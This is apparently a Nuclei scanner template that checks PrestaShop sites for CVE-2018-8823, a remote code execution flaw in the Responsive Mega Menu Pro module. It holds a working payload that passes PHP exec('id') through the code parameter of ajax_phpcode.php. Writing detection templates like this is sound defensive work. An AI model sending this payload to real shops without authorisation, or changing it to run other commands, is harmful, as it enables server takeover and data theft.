41 lines
1.7 KiB
YAML
41 lines
1.7 KiB
YAML
|
id: CVE-2018-8823
|
||
|
|
||
|
info:
|
||
|
name: PrestaShop Responsive Mega Menu Module RCE
|
||
|
author: MaStErChO
|
||
|
severity: critical
|
||
|
description: "The 'Responsive Mega Menu' module for PrestaShop is prone to a remote code execution and SQL injection vulnerability. modules/bamegamenu/ajax_phpcode.php in the Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro module 1.0.32 for PrestaShop allows remote attackers to execute an SQL injection or remote code execution through function calls in the code parameter."
|
||
|
reference: https://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.144185 https://vulners.com/openvas/OPENVAS:1361412562310144185 https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/ https://github.com/advisories/GHSA-q937-6mg8-6rgc https://nvd.nist.gov/vuln/detail/CVE-2018-8823
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
|
cvss-score: 9.8
|
||
|
cve-id: CVE-2018-8823
|
||
|
cwe-id: CWE-94
|
||
|
epss-score: 0.02627
|
||
|
epss-percentile: 0.89205
|
||
|
cpe: cpe:2.3:a:responsive_mega_menu_pro_project:responsive_mega_menu_pro:1.0.32:*:*:*:*:prestashop:*:*
|
||
|
metadata:
|
||
|
max-request: 1
|
||
|
vendor: responsive_mega_menu_pro_project
|
||
|
product: responsive_mega_menu_pro
|
||
|
framework: prestashop
|
||
|
tags: cve,cve2018,prestashop,rce
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/modules/bamegamenu/ajax_phpcode.php?code=echo%20exec%28id%29%3B"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- 'uid='
|
||
|
- 'gid='
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|